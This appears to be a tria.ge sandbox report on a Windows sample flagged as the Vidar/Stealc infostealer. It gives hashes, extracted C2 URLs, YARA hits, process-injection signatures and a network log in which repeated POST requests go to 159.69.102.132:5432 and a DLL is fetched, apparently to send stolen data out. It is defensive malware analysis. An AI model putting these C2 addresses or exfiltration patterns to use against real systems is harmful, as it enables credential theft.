Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
124s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
02/06/2024, 05:05 UTC
Static task
static1
Behavioral task
behavioral1
Sample
c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe
Resource
win10v2004-20240426-en
General
-
Target
c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe
-
Size
2.4MB
-
MD5
8cd882e27591698a955d8ca653a5b246
-
SHA1
7c7bf45a2253024bbb089a2912988fc7ecb0913c
-
SHA256
c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5
-
SHA512
92d2dbb4f2f0ae96c03f31fe236c2622dfeb18fe25e696454f1dad1d014a8371443a96ca36081e027567c83349f3011541b83315d91c53cab053d8f82dc61bc1
-
SSDEEP
49152:wQc81KnB/a/hNT/d1Ya8aesY3Ot4N7G/:wDta/hNT/d1n0etD/
Malware Config
Extracted
stealc
Extracted
vidar
https://t.me/ta904ek
https://steamcommunity.com/profiles/76561199695752269
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Signatures
-
Detect Vidar Stealer 8 IoCs
resource yara_rule behavioral2/memory/3928-2-0x0000000004140000-0x000000000428C000-memory.dmp family_vidar_v7 behavioral2/memory/2504-8-0x0000000000400000-0x0000000000649000-memory.dmp family_vidar_v7 behavioral2/memory/2504-4-0x0000000000400000-0x0000000000649000-memory.dmp family_vidar_v7 behavioral2/memory/2504-10-0x0000000000400000-0x0000000000649000-memory.dmp family_vidar_v7 behavioral2/memory/2504-24-0x0000000000400000-0x0000000000649000-memory.dmp family_vidar_v7 behavioral2/memory/2504-25-0x0000000000400000-0x0000000000649000-memory.dmp family_vidar_v7 behavioral2/memory/2504-42-0x0000000000400000-0x0000000000649000-memory.dmp family_vidar_v7 behavioral2/memory/2504-43-0x0000000000400000-0x0000000000649000-memory.dmp family_vidar_v7 -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2504 kat6E4A.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3928 set thread context of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76 -
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString kat6E4A.tmp -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2504 kat6E4A.tmp 2504 kat6E4A.tmp -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3928 wrote to memory of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76 PID 3928 wrote to memory of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76 PID 3928 wrote to memory of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76 PID 3928 wrote to memory of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76 PID 3928 wrote to memory of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76 PID 3928 wrote to memory of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76 PID 3928 wrote to memory of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76 PID 3928 wrote to memory of 2504 3928 c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe 76
Processes
-
C:\Users\Admin\AppData\Local\Temp\c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe"C:\Users\Admin\AppData\Local\Temp\c5f78a68c521e91493c33885370b6d568cfbbd45751f09c055716a6384c751d5.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Users\Admin\AppData\Local\Temp\kat6E4A.tmpC:\Users\Admin\AppData\Local\Temp\kat6E4A.tmp2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2504
-
Network
-
Remote address:8.8.8.8:53Requestt.meIN AResponset.meIN A149.154.167.99
-
Remote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEctldl.windowsupdate.com.delivery.microsoft.comctldl.windowsupdate.com.delivery.microsoft.comIN CNAMEwu-b-net.trafficmanager.netwu-b-net.trafficmanager.netIN CNAMEdownload.windowsupdate.com.edgesuite.netdownload.windowsupdate.com.edgesuite.netIN CNAMEa767.dspw65.akamai.neta767.dspw65.akamai.netIN A92.123.143.240a767.dspw65.akamai.netIN A92.123.140.25
-
Remote address:8.8.8.8:53Requestocsp.godaddy.comIN AResponseocsp.godaddy.comIN CNAMEocsp.godaddy.com.akadns.netocsp.godaddy.com.akadns.netIN A192.124.249.36ocsp.godaddy.com.akadns.netIN A192.124.249.23ocsp.godaddy.com.akadns.netIN A192.124.249.22ocsp.godaddy.com.akadns.netIN A192.124.249.24ocsp.godaddy.com.akadns.netIN A192.124.249.41
-
Remote address:8.8.8.8:53Request99.167.154.149.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:159.69.102.132:5432RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 159.69.102.132:5432
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 02 Jun 2024 05:05:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request240.143.123.92.in-addr.arpaIN PTRResponse240.143.123.92.in-addr.arpaIN PTRa92-123-143-240deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request132.102.69.159.in-addr.arpaIN PTRResponse132.102.69.159.in-addr.arpaIN PTRstatic13210269159clientsyour-serverde
-
Remote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.111.243.30
-
Remote address:8.8.8.8:53Request36.249.124.192.in-addr.arpaIN PTRResponse36.249.124.192.in-addr.arpaIN PTRcloudproxy10036sucurinet
-
Remote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEctldl.windowsupdate.com.delivery.microsoft.comctldl.windowsupdate.com.delivery.microsoft.comIN CNAMEwu-b-net.trafficmanager.netwu-b-net.trafficmanager.netIN CNAMEbg.microsoft.map.fastly.netbg.microsoft.map.fastly.netIN A199.232.210.172bg.microsoft.map.fastly.netIN A199.232.214.172
-
Remote address:8.8.8.8:53Request30.243.111.52.in-addr.arpaIN PTRResponse
-
Remote address:159.69.102.132:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 159.69.102.132:5432
Content-Length: 279
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 02 Jun 2024 05:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:159.69.102.132:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 159.69.102.132:5432
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 02 Jun 2024 05:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:159.69.102.132:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 159.69.102.132:5432
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 02 Jun 2024 05:05:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:159.69.102.132:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAFIIJDAAAAKFHIDAAAK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 159.69.102.132:5432
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 02 Jun 2024 05:05:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:159.69.102.132:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 159.69.102.132:5432
Content-Length: 4569
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 02 Jun 2024 05:05:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:159.69.102.132:5432RequestGET /sqls.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 159.69.102.132:5432
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 02 Jun 2024 05:05:25 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Mon, 27 May 2024 06:44:25 GMT
Connection: keep-alive
ETag: "66542bc9-258600"
Accept-Ranges: bytes
-
Remote address:159.69.102.132:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 159.69.102.132:5432
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 02 Jun 2024 05:05:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
1.6kB 19.9kB 25 21
-
1.1kB 2.7kB 11 8
HTTP Request
GET https://159.69.102.132:5432/HTTP Response
200 -
1.4kB 622 B 9 6
HTTP Request
POST https://159.69.102.132:5432/HTTP Response
200 -
1.5kB 2.2kB 10 7
HTTP Request
POST https://159.69.102.132:5432/HTTP Response
200 -
1.6kB 6.3kB 13 10
HTTP Request
POST https://159.69.102.132:5432/HTTP Response
200 -
1.4kB 672 B 9 6
HTTP Request
POST https://159.69.102.132:5432/HTTP Response
200 -
5.9kB 605 B 13 7
HTTP Request
POST https://159.69.102.132:5432/HTTP Response
200 -
94.0kB 2.5MB 1829 1826
HTTP Request
GET https://159.69.102.132:5432/sqls.dllHTTP Response
200 -
1.5kB 528 B 8 5
HTTP Request
POST https://159.69.102.132:5432/HTTP Response
200 -
322 B 7
-
328 B 826 B 5 5
DNS Request
t.me
DNS Response
149.154.167.99
DNS Request
ctldl.windowsupdate.com
DNS Response
92.123.143.24092.123.140.25
DNS Request
ocsp.godaddy.com
DNS Response
192.124.249.36192.124.249.23192.124.249.22192.124.249.24192.124.249.41
DNS Request
99.167.154.149.in-addr.arpa
DNS Request
172.210.232.199.in-addr.arpa
-
222 B 411 B 3 3
DNS Request
240.143.123.92.in-addr.arpa
DNS Request
132.102.69.159.in-addr.arpa
DNS Request
nexusrules.officeapps.live.com
DNS Response
52.111.243.30
-
214 B 508 B 3 3
DNS Request
36.249.124.192.in-addr.arpa
DNS Request
ctldl.windowsupdate.com
DNS Response
199.232.210.172199.232.214.172
DNS Request
30.243.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
861KB
MD566064dbdb70a5eb15ebf3bf65aba254b
SHA10284fd320f99f62aca800fb1251eff4c31ec4ed7
SHA2566a94dbda2dd1edcff2331061d65e1baf09d4861cc7ba590c5ec754f3ac96a795
SHA512b05c6c09ae7372c381fba591c3cb13a69a2451b9d38da1a95aac89413d7438083475d06796acb5440cd6ec65b030c9fa6cbdaa0d2fe91a926bae6499c360f17f